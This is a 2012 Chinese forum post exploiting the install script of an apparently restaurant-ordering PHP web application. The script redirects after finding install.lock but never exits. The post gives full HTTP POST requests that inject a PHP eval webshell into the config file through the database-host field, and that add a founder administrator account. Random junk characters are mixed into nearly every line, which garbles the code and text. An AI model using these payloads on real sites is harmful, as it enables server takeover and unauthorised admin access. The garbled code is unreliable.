问题出在/install/index.php文件。在程序安装完后,会在程序根目录下生成install.lock文件。而/install/index.php在判断是否有install.lock时出现错误。5 K H1 i3 \) p+ ]4 D9 e
9 \) j/ b7 h/ s0 A/ }" C<?php
0 e6 A. n9 ]" c3 V9 J0 H$ Z9 `if(file_exists("../install.lock"))
/ i6 v0 V: v8 x8 q+ t{
' U- Q2 ?$ j! U& \3 _( p& W+ H header("Location: ../");//没有退出! D& A/ W/ ^% }6 w7 F7 n
}
" b: z) g$ B0 W: [. }! M! ]
0 b- x/ ? b. s6 E9 [/ b% ]//echo 'tst';exit;
* s8 u8 H5 {$ D7 h) x# T k. o# ^require_once("init.php");
: F, O8 z. }7 F7 O' qif(empty($_REQUEST['step']) || $_REQUEST['step']==1)9 }, @3 i8 S5 ^1 |" n7 l; a. D0 w
{. B; ^ ?3 O! \# k/ q y% z
可见在/install/index.php存在时,只是header做了302重定向并没有退出,也就是说下面的逻辑还是会执行的。在这里至少可以产生两个漏洞。
$ S& S- ^3 l8 z" y+ S8 |; R( x
0 H* P0 l) B8 q1、getshell(很危险)$ ]7 B' M& ]; _" D' p8 n, Y( y
if(empty($_REQUEST['step']) || $_REQUEST['step']==1)9 I# f F+ V8 p! a' B8 z
{
; G( B7 S2 K. C+ p$smarty->assign("step",1);
7 X+ q* u' z- n2 H$smarty->display("index.html");; Q. y5 [3 ~( T( d& r/ q2 j
}elseif($_REQUEST['step']==2)1 O: m3 w- ~3 w4 S, u
{
( r; n* u8 H2 M6 Z. b# C6 g $mysql_host=trim($_POST['mysql_host']);4 P+ f( `, d f0 m4 @" }2 _
$mysql_user=trim($_POST['mysql_user']);3 E+ }6 s6 p8 W- a8 S0 c
$mysql_pwd=trim($_POST['mysql_pwd']);* ]6 ~9 A9 h3 `3 L+ i
$mysql_db=trim($_POST['mysql_db']);
7 b3 d- E- F" h& D* T $tblpre=trim($_POST['tblpre']);7 ~4 O5 f l0 [; Z' u+ H
$domain==trim($_POST['domain']);# \! q/ L3 L( w$ j! _
$str="<?php \r\n";
6 }( j* O9 A( D% [" X6 `9 p $str.='define("MYSQL_HOST","'.$mysql_host.'");'."\r\n";9 N: p" d8 v3 V! e; o+ \. l: i
$str.='define("MYSQL_USER","'.$mysql_user.'");'."\r\n";! E( e- ~1 y' {0 I! j8 Q+ `* [# z) j
$str.='define("MYSQL_PWD","'.$mysql_pwd.'");'."\r\n";
$ J5 t; S. A: d: H# J $str.='define("MYSQL_DB","'.$mysql_db.'");'."\r\n";0 a0 f% C7 D3 n" [+ @
$str.='define("MYSQL_CHARSET","GBK");'."\r\n";
2 g, G; ?( U" M( i $str.='define("TABLE_PRE","'.$tblpre.'");'."\r\n";
; J9 n! C6 u \. j2 q $str.='define("DOMAIN","'.$domain.'");'."\r\n";. C2 u: h, D3 _
$str.='define("SKINS","default");'."\r\n";
: z) k0 q( v4 I8 C. K $str.='?>';1 C" y; F ?6 W$ B8 e3 T; [% V
file_put_contents("../config/config.inc.php",$str);//将提交的数据写入php文件
" I0 B9 M L0 }4 c, j/ f: a5 |上面的代码将POST的数据直接写入了../config/config.inc.php文件,那么我们提交如下POST包,即可获得一句话木马
1 ?) ~8 y8 W7 q$ P: L" {3 e0 u+ ~# ZPOST /canting/install/index.php?m=index&step=2 HTTP/1.1* C, w3 s! y- C
Host: 192.168.80.129; v. n1 t1 `/ f* ~( R) i8 d
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.05 V4 e; s: O% p$ O+ _: z. S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
( o, C ~" P6 e9 F2 x9 R bAccept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
: D6 o6 r! t8 T# a# DAccept-Encoding: gzip, deflate
, x2 W4 i+ F1 e# Y% p" yReferer: http://192.168.80.129/canting/install/index.php?step=1
" a4 S* z2 e5 _& H& gCookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
$ y- d7 S5 L! ~6 @ `5 O2 vContent-Type: application/x-www-form-urlencoded
, x |7 M( \7 r! S3 rContent-Length: 1260 @7 G$ D! s: T5 j- ] L
4 D1 Z b- F: z3 c8 z# }/ Emysql_host=test");@eval($_POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu_&domain=www&button=%CF%C2%D2%BB%B2%BD! l: z! ?, s, d( J0 w& L" i& F
但是这个方法很危险,将导致网站无法运行。
$ ^3 |; S6 k) c d, j
. O+ p* s v5 D3 K2、直接添加管理员
( i) E4 K/ t. j w! j( e# O6 t
) m& C/ s) U+ r- R6 H' Relseif($_REQUEST['step']==5)4 G0 R! k+ y/ g& |0 u' s0 l/ c
{
' C; h# e3 Z- H' s7 f if($_POST)9 f3 t8 c/ ]# ?3 c, y
{ require_once("../config/config.inc.php");
- A, k' U0 i' w' Y" f9 K' f8 z $link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);
k5 V1 e- G5 t$ [, p! u mysql_select_db(MYSQL_DB,$link);
0 W3 u2 d% X) D$ |+ t. O6 _- A mysql_query("SET NAMES ".MYSQL_CHARSET );- x% E' g2 v8 O: t5 _
mysql_query("SET sql_mode=''");
. B8 m! s2 b D s6 D7 L3 j* L
5 t# [, ]3 D7 x4 m8 Q/ A: \ $adminname=trim($_POST['adminname']);; U+ S) X+ w5 h Z9 W% v
$pwd1=trim($_POST['pwd1']);+ O; h T" Y- @" T& Q
$pwd2=trim($_POST['pwd2']);
+ v# y7 r( u9 q if(empty($adminname))
}$ v# M0 y3 t; k. k {* @6 G: O: F' i* B: K5 y' z0 Z
* m2 r2 O1 I7 u3 q8 G" W
echo "<script>alert('管理员不能为空');history.go(-1);</script>";; u3 i+ y v% G9 t( C
exit();9 e' F0 X1 S+ Z9 P* @% c
}2 `" f0 E# H0 { Y
if(($pwd1!=$pwd2) or empty($pwd1))
5 p" |" B8 N) e' M2 k6 z R {2 b9 k8 Y; \) f1 u2 @8 n$ h
echo "<script>alert('两次输入的密码不一致');history.go(-1);</script>";//这里也是没有退出
$ [* t, t* _+ _7 g9 ?) ? }; D9 `, |2 M+ n) \) p1 F
mysql_query("insert into ".TABLE_PRE."admin(adminname,password,isfounder) values('$adminname','".umd5($pwd1)."',1)");//直接可以插入一个管理员0 \! `# }; b- j" t! h( ?& p( I; ]; d
}# N% v& d0 K' k6 q8 B( ~
这样的话我们就可以直接插入一个qingshen/qingshen的管理员帐号,语句如下:
! R( ~- ]' W' t" ~1 f3 | HPOST /canting/install/index.php?m=index&step=5 HTTP/1.1
! F. \# R; l- h2 fHost: 192.168.80.129& y! o: z; M. c( Y, A( S: H
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0# @0 ]; D S" m( z* d; e
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
, \) N$ N2 C. Z9 F* kAccept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.35 z0 Q9 @# C; m: |: R v- F7 q* m
Accept-Encoding: gzip, deflate
) O2 ^, B9 `2 b( YReferer: http://www.2cto.com /canting/install/index.php?step=1
; L1 N# w4 v- A4 U7 T4 r. \; V8 |Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
4 i( |9 t6 X% \4 k: NContent-Type: application/x-www-form-urlencoded6 U. N& s' ^9 u0 n
Content-Length: 46- V6 n5 T$ |9 t1 e$ \
3 a) c8 Z' }! j9 N8 o {
adminname=qingshen&pwd1=qingshen&pwd2=qingshen
* _. j A3 i% Q; u3 ?. h* Z) A1 Y |
发表于 2012-12-4 11:13:44
收藏
支持
反对